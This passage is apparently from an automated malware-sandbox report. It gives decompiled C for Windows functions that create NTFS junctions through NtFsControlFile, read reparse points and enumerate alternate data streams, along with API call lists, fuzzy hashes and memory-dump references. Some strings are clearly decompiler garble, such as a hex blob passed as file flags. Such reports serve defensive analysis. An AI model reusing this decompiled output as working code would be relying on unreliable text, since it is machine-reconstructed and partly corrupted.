                                0x4a5706a0
                                0x4a5706a9
                                0x4a5706ab
                                0x00000000
                                0x00000000
                                0x4a5706bf
                                0x4a5706cb
                                0x00000000
                                0x00000000
                                0x4a5706d3
                                0x4a5706d9
                                0x4a5706df
                                0x4a5706e7
                                0x4a570704
                                0x4a570709
                                0x4a57070c
                                0x4a570714
                                0x4a570715
                                0x4a57071b
                                0x4a5706e7
                                0x00000000
                                0x4a5706d3
                                0x4a57068b
                                0x4a57068f
                                0x4a570693
                                0x00000000
                                0x00000000
                                0x4a570695
                                0x4a570698
                                0x4a57069e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a57069e
                                0x4a5706a4
                                0x4a5706a6
                                0x00000000
                                0x4a5706a6
                                0x4a57064d
                                0x4a570651
                                0x4a570655
                                0x00000000
                                0x00000000
                                0x4a570657
                                0x4a57065a
                                0x4a570660
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a570660
                                0x4a570666
                                0x4a570668
                                0x00000000
                                0x4a570668
                                0x4a5705ef
                                0x4a5705f5
                                0x4a5705f7
                                0x4a5705fa
                                0x4a5705fa
                                0x4a5705fe
                                0x4a5705ff
                                0x4a570606
                                0x00000000
                                0x4a570606
                                0x4a5708b4
                                0x4a5708ba
                                0x4a5708c7
                                0x00000000
                                0x00000000
                                0x4a5708c9
                                0x00000000
                                0x4a5708c9
                                0x4a5705c1
                                0x4a5704f5
                                0x4a5704f5
                                0x4a5708d3
                                0x4a5708d3
                                0x4a5708d8
                                0x4a5708d8
                                0x00000000
                                0x4a5708d8
                                0x4a5704de
                                0x4a5704de
                                0x4a5708d9
                                0x4a5708e6
                                0x4a5708e6

                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,00000000), ref: 4A570509
                                • FindFirstFileW.KERNEL32(?,00000400,?,00000104,Function_00009FFC,?,00000104,?), ref: 4A5705B6
                                  • Part of subcall function 4A570202: GetFullPathNameW.KERNEL32(4A5708D8,00000004,?,?,766F43D5), ref: 4A570227
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileFindFirst$FullNamePath
                                • String ID: \\?\
                                • API String ID: 3395701646-4282027825
                                • Opcode ID: e59adf80cfec86840a34668b7fbcd0801736d378eeb07d04f79928ff9439efd5
                                • Instruction ID: 8cc3eabdd972debd3bba87343d3063293f82f6a8b8e41487c23eebc56c98d189
                                • Opcode Fuzzy Hash: e59adf80cfec86840a34668b7fbcd0801736d378eeb07d04f79928ff9439efd5
                                • Instruction Fuzzy Hash: 43C102B990121AAAFB10ABA4CE44FEA77F8EF45314F0146A2E505FB455E7B0DE84CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A571E5F, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 162filememorynativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E4A571E5F(void* __ecx, void* __eflags, WCHAR* _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				short _v26;
				void* _v28;
				void* _v36;
				void* _t63;
				WCHAR* _t66;
				intOrPtr* _t78;
				signed short _t82;
				long _t88;
				long _t92;
				short _t94;
				void* _t99;
				short* _t100;
				intOrPtr _t101;
				WCHAR* _t104;
				void* _t105;

				_v8 = 1;
				_v28 = 0;
				_v26 = 0;
				_v24 = 0;
				_v20 = 0;
				_a4 = E4A571B0B(__ecx, _a4[4]);
				_t104 = E4A571B0B(__ecx, _a4[6]);
				_v12 = _t104;
				if(_a4 == 0 || _t104 == 0) {
					L18:
					if(_v24 != 0) {
						RtlFreeHeap( *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18), 0, _v24);
					}
					if(_v8 != 0 && _v20 != 0) {
						RemoveDirectoryW(_a4);
					}
					return _v8;
				} else {
					if(E4A571BCF(_a4) != 0) {
						if(E4A571B70(_t104) != 0) {
							if(CreateDirectoryW(_a4, 0) == 0) {
								goto L18;
							}
							_v20 = 1;
							_t63 = CreateFileW(_a4, 0x40000000, 1, 0, 3, "effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0", 0);
							_v16 = _t63;
							if(_t63 == 0xffffffff) {
								goto L18;
							}
							RtlDosPathNameToNtPathName_U(_t104,  &_v28, 0, 0);
							_t66 = _t104;
							_t18 =  &(_t66[1]); // 0x2
							_t100 = _t18;
							do {
								_t94 =  *_t66;
								_t66 =  &(_t66[1]);
							} while (_t94 != 0);
							_t92 = (_v28 & 0x0000ffff) + 0x14 + (_t66 - _t100 >> 1) * 2;
							_t105 = E4A551896(_t92);
							if(_t105 == 0) {
								L17:
								CloseHandle(_v16);
								goto L18;
							}
							memset(_t105, 0, _t92);
							 *_t105 = 0xa0000003;
							 *((short*)(_t105 + 4)) = _t92 - 8;
							 *((short*)(_t105 + 8)) = 0;
							 *(_t105 + 0xa) = _v28;
							_t30 = _t105 + 0x10; // 0x10
							memcpy(_t30, _v24, _v28 & 0x0000ffff);
							 *((short*)(_t105 + 0xc)) =  *(_t105 + 0xa) + 2;
							_t78 = _v12;
							_t99 = _t78 + 2;
							do {
								_t101 =  *_t78;
								_t78 = _t78 + 2;
							} while (_t101 != 0);
							_t82 = (_t78 - _t99 >> 1) + (_t78 - _t99 >> 1);
							 *(_t105 + 0xe) = _t82;
							memcpy(( *(_t105 + 0xa) & 0x0000ffff) + _t105 + 0x12, _v12, _t82 & 0x0000ffff);
							_t88 = NtFsControlFile(_v16, 0, 0, 0,  &_v36, 0x900a4, _t105, _t92, 0, 0);
							if(_t88 >= 0) {
								_v8 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L17;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L18;
					}
					_push(0x4000272e);
					goto L4;
				}
			}























                                0x4a571e77
                                0x4a571e7a
                                0x4a571e7e
                                0x4a571e82
                                0x4a571e85
                                0x4a571e90
                                0x4a571e98
                                0x4a571e9a
                                0x4a571ea0
                                0x4a571ffa
                                0x4a571ffd
                                0x4a57200f
                                0x4a57200f
                                0x4a572018
                                0x4a572022
                                0x4a572022
                                0x4a57202f
                                0x4a571eae
                                0x4a571eb8
                                0x4a571ed2
                                0x4a571ee7
                                0x00000000
                                0x00000000
                                0x4a571eff
                                0x4a571f02
                                0x4a571f08
                                0x4a571f0e
                                0x00000000
                                0x00000000
                                0x4a571f1b
                                0x4a571f21
                                0x4a571f23
                                0x4a571f23
                                0x4a571f26
                                0x4a571f26
                                0x4a571f2a
                                0x4a571f2b
                                0x4a571f38
                                0x4a571f42
                                0x4a571f46
                                0x4a571ff1
                                0x4a571ff4
                                0x00000000
                                0x4a571ff4
                                0x4a571f4f
                                0x4a571f56
                                0x4a571f5f
                                0x4a571f63
                                0x4a571f6b
                                0x4a571f77
                                0x4a571f7b
                                0x4a571f8b
                                0x4a571f8f
                                0x4a571f92
                                0x4a571f95
                                0x4a571f95
                                0x4a571f99
                                0x4a571f9a
                                0x4a571fa3
                                0x4a571fa5
                                0x4a571fb9
                                0x4a571fd4
                                0x4a571fdc
                                0x4a571fee
                                0x4a571fde
                                0x4a571fe6
                                0x4a571fe6
                                0x00000000
                                0x4a571fdc
                                0x4a571ed4
                                0x4a571ebf
                                0x4a571ebf
                                0x00000000
                                0x4a571ebf
                                0x4a571eba
                                0x00000000
                                0x4a571eba

                                APIs
                                  • Part of subcall function 4A571B0B: GetFullPathNameW.KERNEL32(?,00000000,00000000,?), ref: 4A571B28
                                  • Part of subcall function 4A571B0B: SetLastError.KERNEL32(00000008,00000000), ref: 4A571B41
                                  • Part of subcall function 4A571B0B: GetFullPathNameW.KERNEL32(?,00000000,00000000,?,00000000), ref: 4A571B54
                                • SetLastError.KERNEL32(40002749), ref: 4A571EBF
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 4A571EDF
                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0,00000000), ref: 4A571F02
                                • RtlDosPathNameToNtPathName_U.NTDLL ref: 4A571F1B
                                • memset.MSVCRT ref: 4A571F4F
                                • memcpy.MSVCRT ref: 4A571F7B
                                • memcpy.MSVCRT ref: 4A571FB9
                                • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,00000000,?,00000000,00000000), ref: 4A571FD4
                                • RtlNtStatusToDosError.NTDLL ref: 4A571FDF
                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 4A571FE6
                                • CloseHandle.KERNEL32(?), ref: 4A571FF4
                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 4A57200F
                                • RemoveDirectoryW.KERNEL32(?), ref: 4A572022
                                  • Part of subcall function 4A571BCF: GetVolumePathNameW.KERNEL32 ref: 4A571BF6
                                Strings
                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A571EEE
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Path$ErrorName$Last$CreateDirectoryFileFullmemcpy$CloseControlFreeHandleHeapName_RemoveStatusVolumememset
                                • String ID: effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 4118313034-4107897917
                                • Opcode ID: f04ae25afe8b746a3645ba5622325503cf8ef63d42bb95bbdc4271135f9ea2eb
                                • Instruction ID: 66b5a1561b9a1065b4c37d9deb58d96b4b3b7995500fbe79b38a2e4c40f6d277
                                • Opcode Fuzzy Hash: f04ae25afe8b746a3645ba5622325503cf8ef63d42bb95bbdc4271135f9ea2eb
                                • Instruction Fuzzy Hash: 4F519179801206AACB21BFA5CE48DAFBFB8FF89700F00451AF456E7524E7709A40CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55A902, Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 417COMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E4A55A902(void* _a4, void* _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				short _v528;
				char _v1048;
				signed int _v17422;
				signed int _v17424;
				signed short _v17426;
				signed int _v17428;
				void _v17436;
				char _v17956;
				short _v18026;
				char _v18028;
				char _v18036;
				intOrPtr _v18040;
				signed int _v18044;
				int _v18048;
				void* _v18052;
				void* _v18056;
				void* _v18060;
				long _v18064;
				char _v18068;
				char _v18072;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				int _t182;
				int _t183;
				int _t185;
				intOrPtr _t186;
				int _t190;
				int _t193;
				void* _t195;
				intOrPtr* _t196;
				int _t201;
				int _t202;
				signed int _t204;
				intOrPtr _t205;
				int _t206;
				void* _t207;
				int _t210;
				int _t213;
				intOrPtr _t216;
				int _t217;
				void* _t218;
				int _t221;
				int _t224;
				void* _t226;
				int _t227;
				intOrPtr* _t229;
				signed int _t231;
				void* _t234;
				signed int _t245;
				signed int _t246;
				intOrPtr _t254;
				int _t255;
				int _t258;
				int _t260;
				int _t265;
				int _t272;
				intOrPtr _t279;
				signed int* _t281;
				signed short _t285;
				signed int* _t286;
				int _t288;
				intOrPtr _t289;
				intOrPtr _t291;
				int _t293;
				intOrPtr _t296;
				signed int _t297;
				void* _t300;
				int _t301;
				signed int _t302;
				signed int* _t303;
				signed int _t304;

				E4A552C26(0x4694);
				_t176 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t176 ^ _t304;
				_t298 = _a8;
				_t303 = _a16;
				_t281 = _t298 + 4;
				_t282 = _t281[7];
				_v18040 = _a12;
				_t300 = _a4;
				 *((intOrPtr*)(_t300 + 0x28)) =  *((intOrPtr*)(_t300 + 0x28)) + _t281[8];
				_v18060 = _t300;
				_v18044 = _t298;
				asm("adc [edi+0x2c], ecx");
				_t180 =  *_t303;
				if((_t180 & 0x00000010) == 0 || _t180 < 0) {
					L2:
					_t181 =  *_t303;
					if((_t181 & 0x00000040) == 0) {
						__eflags = _t181 & 0x00000004;
						if((_t181 & 0x00000004) != 0) {
							L21:
							_t182 = E4A571214(_t281, _t282, _v18040, _t181, _t281);
							L4:
							_v18048 = _t182;
							L5:
							_t183 = _v18048;
							goto L6;
						}
						__eflags = _t181 & 0x00000402;
						if(__eflags == 0) {
							_t285 =  *(_t298 + 2) & 0x0000ffff;
							__eflags = _t285;
							if(__eflags == 0) {
								_t286 =  &(_t281[0xb]);
							} else {
								_t286 = _t281 + 0x2c + (_t285 & 0x0000ffff) * 2;
							}
							_push(_t281);
							_t185 = E4A571066(_t281, _t286, _t300, _t303, __eflags, _v18040, _t181, _t286);
							_v18048 = _t185;
							__eflags = _t185;
							if(_t185 == 0) {
								_t186 =  *0x4a5908d8; // 0xc
								__eflags = _t186 + 2;
								E4A562CB6(_t286, _v18040, _t186 + 2);
								_v18048 = E4A5712BE(_t281, _v18040, _t303[0x17],  *_t303, _t281);
							}
							_t183 = E4A56330F(_v18040);
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							}
							goto L6;
						}
						_t190 = E4A562BCD(_t281, _t282, __eflags, _v18040, _t303[0x17], _t181, _t281);
						_v18048 = _t190;
						__eflags = _t190;
						if(_t190 != 0) {
							L18:
							_t183 = E4A56330F(_v18040);
							__eflags = _t183;
							if(_t183 != 0) {
								goto L6;
							}
							__eflags =  *_t303 & 0x00100000;
							if(( *_t303 & 0x00100000) == 0) {
								goto L5;
							}
							_t193 = E4A559F7B( &_v528, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
							__eflags = _t193;
							if(_t193 == 0) {
								_t195 =  &_v528;
								__imp__FindFirstStreamW(_t195, 0,  &_v18036, _t193);
								_t300 = _t195;
								__eflags = _t300 - 0xffffffff;
								if(_t300 == 0xffffffff) {
									goto L5;
								} else {
									goto L64;
								}
								do {
									L64:
									_t196 =  &_v18028;
									_t298 = _t196 + 2;
									do {
										_t288 =  *_t196;
										_t196 = _t196 + 2;
										__eflags = _t288;
									} while (_t288 != 0);
									__eflags = _t196 - _t298 >> 1 - 2;
									if(__eflags < 0) {
										L68:
										_t201 = E4A571387(_t288, __eflags, _v18040,  *_t303, _t281,  &_v18036);
										_v18048 = _t201;
										__eflags = _t201;
										if(_t201 != 0) {
											goto L70;
										}
										_t183 = E4A56330F(_v18040);
										__eflags = _t183;
										if(_t183 != 0) {
											goto L6;
										}
										goto L70;
									}
									__eflags = _v18026 - 0x3a;
									if(__eflags == 0) {
										goto L70;
									}
									goto L68;
									L70:
									_t202 =  &_v18036;
									__imp__FindNextStreamW(_t300, _t202);
									__eflags = _t202;
								} while (_t202 != 0);
								FindClose(_t300);
							}
							goto L5;
						}
						__eflags =  *_t303 & 0x00000400;
						if(( *_t303 & 0x00000400) != 0) {
							_t204 = _v18044;
							__eflags =  *((short*)(_t204 + 2));
							if( *((short*)(_t204 + 2)) != 0) {
								_t272 =  *0x4a5740a8; // 0x13
								_t296 =  *0x4a5906c4; // 0x11
								_t51 = _t272 + 2; // 0x13
								E4A562CB6(_t296, _v18040, _t296 + _t51);
								_push(_t281);
								E4A55AA6D(_t281, _t296, _t300, _v18040,  *_t303, _t281 + 0x2c + ( *(_v18044 + 2) & 0x0000ffff) * 2);
							}
							_t205 =  *0x4a5906c4; // 0x11
							_t289 =  *0x4a5908d8; // 0xc
							_t290 = _t289 + _t205;
							_t206 =  *0x4a5740a8; // 0x13
							_t60 = _t206 + 3; // 0xf
							_t207 = _t289 + _t205 + _t60;
						} else {
							_t279 =  *0x4a5906c4; // 0x11
							_t290 =  *0x4a5740a8; // 0x13
							_t35 = _t279 + 2; // 0x15
							_t207 = _t290 + _t35;
						}
						E4A562CB6(_t290, _v18040, _t207);
						__eflags =  *_t303 & 0x00040000;
						if(( *_t303 & 0x00040000) != 0) {
							_v18044 = _v18044 & 0x00000000;
							_v18056 = 0x104;
							_v18052 = 0x104;
							_t210 = E4A551896(0x10000);
							_v18048 = _t210;
							__eflags = _t210;
							if(_t210 != 0) {
								_t213 = E4A559F7B( &_v1048, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
								__eflags = _t213;
								if(_t213 != 0) {
									L30:
									E4A55AAF4(_v18040, "...");
									L35:
									E4A55142E(_v18048);
									L36:
									__eflags =  *_t303 & 0x00000400;
									_t291 =  *0x4a5908dc; // 0x16
									if(( *_t303 & 0x00000400) == 0) {
										_t216 =  *0x4a5906c4; // 0x11
										_t290 = _t291 + _t216;
										__eflags = _t290;
										_t217 =  *0x4a5740a8; // 0x13
										_t96 = _t217 + 3; // 0x19
										_t218 = _t290 + _t96;
									} else {
										_t254 =  *0x4a5908d8; // 0xc
										_t290 = _t291 + _t254 +  *0x4a5906c4;
										_t255 =  *0x4a5740a8; // 0x13
										_t94 = _t255 + 4; // -1247348394
										_t218 = _t291 + _t254 +  *0x4a5906c4 + _t94;
									}
									E4A562CB6(_t290, _v18040, _t218);
									goto L17;
								}
								_t258 =  *0x4a57402c( &_v1048, 1, _v18048, 0x10000,  &_v18068);
								__eflags = _t258;
								if(_t258 == 0) {
									goto L30;
								}
								_push( &_v18072);
								_t260 =  &_v18044;
								_push(_t260);
								_push(_v18048);
								M4A574028();
								__eflags = _t260;
								if(_t260 != 0) {
									_push( &_v18064);
									_push( &_v18052);
									_push( &_v17956);
									_push( &_v18056);
									_t265 =  &_v528;
									_push(_t265);
									_push(_v18044);
									_push(0);
									M4A574024();
									__eflags = _t265;
									if(_t265 != 0) {
										E4A55AAF4(_v18040,  &_v17956);
										E4A55AAF4(_v18040, E4A552EC8);
										_push( &_v528);
									} else {
										_push("...");
									}
									_push(_v18040);
									E4A55AAF4();
									_t88 =  &_v18044;
									 *_t88 = _v18044 & 0x00000000;
									__eflags =  *_t88;
									goto L35;
								}
								goto L30;
							}
							E4A55AAF4(_v18040, "...");
							goto L36;
						} else {
							L17:
							_push(_t281);
							_t221 = E4A55AA6D(_t281, _t290, _t300, _v18040,  *_t303,  &(_t281[0xb]));
							__eflags =  *_t281 & 0x00000400;
							_v18048 = _t221;
							if(( *_t281 & 0x00000400) != 0) {
								__eflags = _t281[9] & 0x20000000;
								if((_t281[9] & 0x20000000) == 0) {
									goto L18;
								}
								_t224 = E4A559F7B( &_v528, 0x104,  *((intOrPtr*)(_t300 + 4)),  &(_t281[0xb]));
								__eflags = _t224;
								if(_t224 == 0) {
									_t226 = CreateFileW( &_v528, 8, 7, 0, 3, 0x2200000, 0);
									_v18056 = _t226;
									__eflags = _t226 - 0xffffffff;
									if(_t226 != 0xffffffff) {
										_t298 =  &_v17436;
										_t227 = DeviceIoControl(_t226, 0x900a8, 0, 0,  &_v17436, 0x4002,  &_v18064, 0);
										__eflags = _t227;
										if(_t227 != 0) {
											E4A55AAF4(_v18040, 0x4a56b0f4);
											__eflags = _v17436 - 0xa0000003;
											if(_v17436 != 0xa0000003) {
												__eflags = _v17436 - 0xa000000c;
												if(_v17436 != 0xa000000c) {
													_t229 = 0x4a56b124;
													_v18044 = 0x4a56b124;
													_t298 = 0x4a56b126;
													do {
														_t293 =  *_t229;
														_t229 = _t229 + 2;
														__eflags = _t293;
													} while (_t293 != 0);
													_t231 = _t229 - 0x4a56b126;
													__eflags = _t231;
													_t301 = (_t231 >> 1) + (_t231 >> 1);
													L58:
													_t234 = E4A551896(_t301 + 2);
													_v18052 = _t234;
													__eflags = _t234;
													if(_t234 != 0) {
														memcpy(_t234, _v18044, _t301);
														_t302 = _t301 >> 1;
														__eflags = _t302;
														 *((short*)(_v18052 + _t302 * 2)) = 0;
														E4A55AAF4(_v18040, _v18052);
														E4A55142E(_v18052);
													}
													E4A55AAF4(_v18040, 0x4a56b0f0);
													_t300 = _v18060;
													L61:
													CloseHandle(_v18056);
													goto L18;
												}
												_t301 = _v17422 & 0x0000ffff;
												_v18044 = _t304 + ((_v17424 & 0x0000ffff) >> 1) * 2 - 0x4404;
												__eflags = _t301;
												if(_t301 != 0) {
													goto L58;
												}
												_t245 = (_v17428 & 0x0000ffff) >> 1;
												__eflags = _t245;
												_t246 = _t304 + _t245 * 2 - 0x4404;
												L54:
												_t301 = _v17426 & 0x0000ffff;
												_v18044 = _t246;
												goto L58;
											}
											_t301 = _v17422 & 0x0000ffff;
											_v18044 = _t304 + ((_v17424 & 0x0000ffff) >> 1) * 2 - 0x4408;
											__eflags = _t301;
											if(_t301 != 0) {
												goto L58;
											}
											_t246 = _t304 + ((_v17428 & 0x0000ffff) >> 1) * 2 - 0x4408;
											goto L54;
										}
										_push(L" [...]");
										L47:
										_push(_v18040);
										E4A55AAF4();
										goto L61;
									}
									_push(L" [..]");
									goto L47;
								}
								E4A55AAF4(_v18040, L" [.]");
							}
							goto L18;
						}
					}
					_t182 = E4A55ABA0(_t303, _v18040, _t181,  *((intOrPtr*)(_t300 + 4)), _t281);
					goto L4;
				} else {
					 *_t303 = _t180 & 0xffffffef;
					_t183 = E4A55B0B7(_t300, _v18040, _t303);
					 *_t303 =  *_t303 | 0x00000010;
					_t297 =  *_t303;
					__eflags = _t183;
					if(_t183 != 0) {
						L6:
						return E4A5513A9(_t183, _t281, _v8 ^ _t304, _t298, _t300, _t303);
					}
					_t298 = _v18044;
					_t282 = _t297 | 0x80000000;
					 *_t303 = _t297 | 0x80000000;
					goto L2;
				}
			}















































































                                0x4a55a90c
                                0x4a55a911
                                0x4a55a918
                                0x4a55a91b
                                0x4a55a923
                                0x4a55a926
                                0x4a55a929
                                0x4a55a92c
                                0x4a55a936
                                0x4a55a939
                                0x4a55a93c
                                0x4a55a942
                                0x4a55a948
                                0x4a55a94b
                                0x4a55a94f
                                0x4a55a959
                                0x4a55a959
                                0x4a55a95d
                                0x4a563262
                                0x4a563264
                                0x4a56ac0f
                                0x4a56ac17
                                0x4a55a973
                                0x4a55a973
                                0x4a55a979
                                0x4a55a979
                                0x00000000
                                0x4a55a979
                                0x4a56326a
                                0x4a56326f
                                0x4a56b086
                                0x4a56b08a
                                0x4a56b08d
                                0x4a56b098
                                0x4a56b08f
                                0x4a56b092
                                0x4a56b092
                                0x4a56b09b
                                0x4a56b0a4
                                0x4a56b0a9
                                0x4a56b0af
                                0x4a56b0b1
                                0x4a56b0b3
                                0x4a56b0b8
                                0x4a56b0c2
                                0x4a56b0d8
                                0x4a56b0d8
                                0x4a56b0e4
                                0x4a560c21
                                0x4a560c23
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a560c29
                                0x4a563280
                                0x4a563285
                                0x4a56328b
                                0x4a56328d
                                0x4a5632e6
                                0x4a5632ec
                                0x4a5632f1
                                0x4a5632f3
                                0x00000000
                                0x00000000
                                0x4a5632f9
                                0x4a5632ff
                                0x00000000
                                0x00000000
                                0x4a56afe1
                                0x4a56afe6
                                0x4a56afe8
                                0x4a56aff8
                                0x4a56afff
                                0x4a56b005
                                0x4a56b007
                                0x4a56b00a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56b010
                                0x4a56b010
                                0x4a56b010
                                0x4a56b016
                                0x4a56b019
                                0x4a56b019
                                0x4a56b01d
                                0x4a56b01e
                                0x4a56b01e
                                0x4a56b027
                                0x4a56b02a
                                0x4a56b036
                                0x4a56b046
                                0x4a56b04b
                                0x4a56b051
                                0x4a56b053
                                0x00000000
                                0x00000000
                                0x4a56b05b
                                0x4a56b060
                                0x4a56b062
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56b062
                                0x4a56b02c
                                0x4a56b034
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56b068
                                0x4a56b068
                                0x4a56b070
                                0x4a56b076
                                0x4a56b076
                                0x4a56b07b
                                0x4a56b07b
                                0x00000000
                                0x4a56afe8
                                0x4a56328f
                                0x4a563295
                                0x4a56ac21
                                0x4a56ac27
                                0x4a56ac2c
                                0x4a56ac2e
                                0x4a56ac33
                                0x4a56ac39
                                0x4a56ac44
                                0x4a56ac53
                                0x4a56ac61
                                0x4a56ac61
                                0x4a56ac66
                                0x4a56ac6b
                                0x4a56ac71
                                0x4a56ac73
                                0x4a56ac78
                                0x4a56ac78
                                0x4a56329b
                                0x4a56329b
                                0x4a5632a0
                                0x4a5632a6
                                0x4a5632a6
                                0x4a5632a6
                                0x4a5632b1
                                0x4a5632b6
                                0x4a5632bc
                                0x4a56ac81
                                0x4a56ac92
                                0x4a56ac98
                                0x4a56ac9e
                                0x4a56aca3
                                0x4a56aca9
                                0x4a56acab
                                0x4a56acd5
                                0x4a56acda
                                0x4a56acdc
                                0x4a56ad21
                                0x4a56ad2c
                                0x4a56adaa
                                0x4a56adb0
                                0x4a56adb5
                                0x4a56adb5
                                0x4a56adbb
                                0x4a56adc1
                                0x4a56addb
                                0x4a56ade0
                                0x4a56ade0
                                0x4a56ade2
                                0x4a56ade7
                                0x4a56ade7
                                0x4a56adc3
                                0x4a56adc3
                                0x4a56adca
                                0x4a56add0
                                0x4a56add5
                                0x4a56add5
                                0x4a56add5
                                0x4a56adf2
                                0x00000000
                                0x4a56adf2
                                0x4a56acf9
                                0x4a56acff
                                0x4a56ad01
                                0x00000000
                                0x00000000
                                0x4a56ad09
                                0x4a56ad0a
                                0x4a56ad10
                                0x4a56ad11
                                0x4a56ad17
                                0x4a56ad1d
                                0x4a56ad1f
                                0x4a56ad39
                                0x4a56ad40
                                0x4a56ad47
                                0x4a56ad4e
                                0x4a56ad4f
                                0x4a56ad55
                                0x4a56ad56
                                0x4a56ad5c
                                0x4a56ad5e
                                0x4a56ad64
                                0x4a56ad66
                                0x4a56ad7c
                                0x4a56ad8c
                                0x4a56ad97
                                0x4a56ad68
                                0x4a56ad68
                                0x4a56ad68
                                0x4a56ad98
                                0x4a56ad9e
                                0x4a56ada3
                                0x4a56ada3
                                0x4a56ada3
                                0x00000000
                                0x4a56ada3
                                0x00000000
                                0x4a56ad1f
                                0x4a56acb8
                                0x00000000
                                0x4a5632c2
                                0x4a5632c2
                                0x4a5632c2
                                0x4a5632cf
                                0x4a5632d4
                                0x4a5632da
                                0x4a5632e0
                                0x4a56adfc
                                0x4a56ae03
                                0x00000000
                                0x00000000
                                0x4a56ae1c
                                0x4a56ae21
                                0x4a56ae23
                                0x4a56ae50
                                0x4a56ae56
                                0x4a56ae5c
                                0x4a56ae5f
                                0x4a56ae77
                                0x4a56ae86
                                0x4a56ae8c
                                0x4a56ae8e
                                0x4a56aeb0
                                0x4a56aeb5
                                0x4a56aebf
                                0x4a56aef4
                                0x4a56aefe
                                0x4a56af40
                                0x4a56af45
                                0x4a56af4b
                                0x4a56af4e
                                0x4a56af4e
                                0x4a56af52
                                0x4a56af53
                                0x4a56af53
                                0x4a56af58
                                0x4a56af58
                                0x4a56af5c
                                0x4a56af5f
                                0x4a56af63
                                0x4a56af68
                                0x4a56af6e
                                0x4a56af70
                                0x4a56af7a
                                0x4a56af91
                                0x4a56af91
                                0x4a56af93
                                0x4a56af97
                                0x4a56afa2
                                0x4a56afa2
                                0x4a56afb2
                                0x4a56afb7
                                0x4a56afbd
                                0x4a56afc3
                                0x00000000
                                0x4a56afc3
                                0x4a56af07
                                0x4a56af17
                                0x4a56af1d
                                0x4a56af1f
                                0x00000000
                                0x00000000
                                0x4a56af28
                                0x4a56af28
                                0x4a56af2a
                                0x4a56af31
                                0x4a56af31
                                0x4a56af38
                                0x00000000
                                0x4a56af38
                                0x4a56aec8
                                0x4a56aed8
                                0x4a56aede
                                0x4a56aee0
                                0x00000000
                                0x00000000
                                0x4a56aeeb
                                0x00000000
                                0x4a56aeeb
                                0x4a56ae90
                                0x4a56ae95
                                0x4a56ae95
                                0x4a56ae9b
                                0x00000000
                                0x4a56ae9b
                                0x4a56ae61
                                0x00000000
                                0x4a56ae61
                                0x4a56ae30
                                0x4a56ae30
                                0x00000000
                                0x4a5632e0
                                0x4a5632bc
                                0x4a55a96e
                                0x00000000
                                0x4a560bef
                                0x4a560bfa
                                0x4a560bfc
                                0x4a560c01
                                0x4a560c04
                                0x4a560c06
                                0x4a560c08
                                0x4a55a97f
                                0x4a55a98d
                                0x4a55a98d
                                0x4a560c0e
                                0x4a560c14
                                0x4a560c1a
                                0x00000000
                                0x4a560c1a

                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: [...]$ [..]$ [.]$...$:
                                • API String ID: 0-1980097535
                                • Opcode ID: 31a1f80c65e237ac3265ef12a868f92aff3f23a9b0b9461d560643bb4ff94314
                                • Instruction ID: 695ffd4a56f696ceb886a6424704cbc2b0ac539f3e12ad2e80f896d9c2c88fb2
                                • Opcode Fuzzy Hash: 31a1f80c65e237ac3265ef12a868f92aff3f23a9b0b9461d560643bb4ff94314
